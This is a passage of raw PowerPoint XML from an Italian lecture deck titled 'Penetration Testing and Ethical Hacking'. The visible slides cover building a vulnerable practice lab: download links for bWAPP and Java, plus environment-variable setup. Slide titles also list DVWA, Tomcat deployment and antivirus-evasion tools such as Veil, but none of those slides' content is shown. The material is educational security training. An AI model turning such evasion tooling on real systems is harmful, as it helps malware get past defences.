            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t>BVWA: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://sourceforge.net/projects/bwapp/files/latest/download</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="9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Scaricare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installare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Java JRE e JDK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1598612" y="1828800"/>
            <a:ext cx="8229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JDK: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https://www.oracle.com/technetwork/java/javase/downloads/index.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>JRE: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://javadl.oracle.com/webapps/download/AutoDL?BundleId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>[...]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="Java-Buddy: Install JDK 7 on Windows 8 (Official version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9812" y="2667000"/>
            <a:ext cx="4895850" cy="37433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457200"/>
            <a:ext cx="9143998" cy="1020762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aggiungere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> JDK e JRE </a:t>
            </a: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variabili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>d’ambiente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1674812" y="1828800"/>
            <a:ext cx="822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1. Avviare il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Panel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> e poi cliccare su System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Screenshot (2).png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="19355" t="7921" r="12903" b="22766"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2513012" y="2362200"/>
            <a:ext cx="7620000" cy="42333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457200"/>
            <a:ext cx="9143998" cy="1020762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aggiungere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> JDK e JRE </a:t>
            </a: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variabili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>d’ambiente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1598612" y="1828800"/>
            <a:ext cx="822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2.  Cliccare su “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Advanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>settings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>”  e poi su “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Variables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>” </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Screenshot (2).png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="19355" t="7921" r="12903" b="22766"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="2362200"/>
            <a:ext cx="7620000" cy="42333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457200"/>
            <a:ext cx="9143998" cy="1020762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aggiungere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> JDK e JRE </a:t>
            </a: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variabili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>d’ambiente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1446212" y="2590800"/>
            <a:ext cx="457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it-IT" dirty="0" smtClean="0"/>
              <a:t>3.	Aggiungere “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>JRE_HOME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>” con il percorso di installazione della JRE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>4. 	Aggiungere “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>JAVA_HOME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>” con il percorso di installazione della JDK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Schermata del 2019-07-07 10-34-4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0212" y="1600200"/>
            <a:ext cx="4495800" cy="50777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834</TotalTime>
  <Words>3096</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Personalizzato</PresentationFormat>
  <Paragraphs>294</Paragraphs>
  <Slides>52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52</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="53" baseType="lpstr">
      <vt:lpstr>Chalkboard 16x9</vt:lpstr>
      <vt:lpstr>Penetration Testing and Ethical Hacking</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Creare una macchina vulnerabile</vt:lpstr>
      <vt:lpstr>Avviare con VirtualBox </vt:lpstr>
      <vt:lpstr>Scaricare ed installare XAMPP</vt:lpstr>
      <vt:lpstr>Scaricare ed installare Java JRE e JDK</vt:lpstr>
      <vt:lpstr>Aggiungere JDK e JRE alle variabili d’ambiente</vt:lpstr>
      <vt:lpstr>Aggiungere JDK e JRE alle variabili d’ambiente</vt:lpstr>
      <vt:lpstr>Aggiungere JDK e JRE alle variabili d’ambiente</vt:lpstr>
      <vt:lpstr>Scaricare ed Installare Python </vt:lpstr>
      <vt:lpstr>Configurare Tomcat </vt:lpstr>
      <vt:lpstr>Download e installazione DVWA</vt:lpstr>
      <vt:lpstr>Configurare DVWA</vt:lpstr>
      <vt:lpstr>Configurare DVWA</vt:lpstr>
      <vt:lpstr>Configurare DVWA</vt:lpstr>
      <vt:lpstr>Configurare DVWA</vt:lpstr>
      <vt:lpstr>Configurare DVWA</vt:lpstr>
      <vt:lpstr>Configurare DVWA</vt:lpstr>
      <vt:lpstr>Configurare DVWA</vt:lpstr>
      <vt:lpstr>Download e installazione BWAPP</vt:lpstr>
      <vt:lpstr>Download e installazione BWAPP</vt:lpstr>
      <vt:lpstr>Scaricare usu.war e Infiniti.war</vt:lpstr>
      <vt:lpstr>Copiare in Tomcat usu.war e Infiniti.war</vt:lpstr>
      <vt:lpstr>Avviare Tomcat</vt:lpstr>
      <vt:lpstr>Penetration Test Report</vt:lpstr>
      <vt:lpstr>Tool per la Ricerca di Vulnerabilità</vt:lpstr>
      <vt:lpstr>Tool per AV/Evasion – Social Engineering Toolkit </vt:lpstr>
      <vt:lpstr>Tool per AV/Evasion – Veil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  <vt:lpstr>Diapositiva 48</vt:lpstr>
      <vt:lpstr>Diapositiva 49</vt:lpstr>
      <vt:lpstr>Diapositiva 50</vt:lpstr>
      <vt:lpstr>Diapositiva 51</vt:lpstr>
      <vt:lpstr>Diapositiva 52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lastModifiedBy>Francesco Garofalo</cp:lastModifiedBy>
  <cp:revision>85</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-04-17T22:18:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-23T08:17:30Z</dcterms:modified>
</cp:coreProperties>
</file>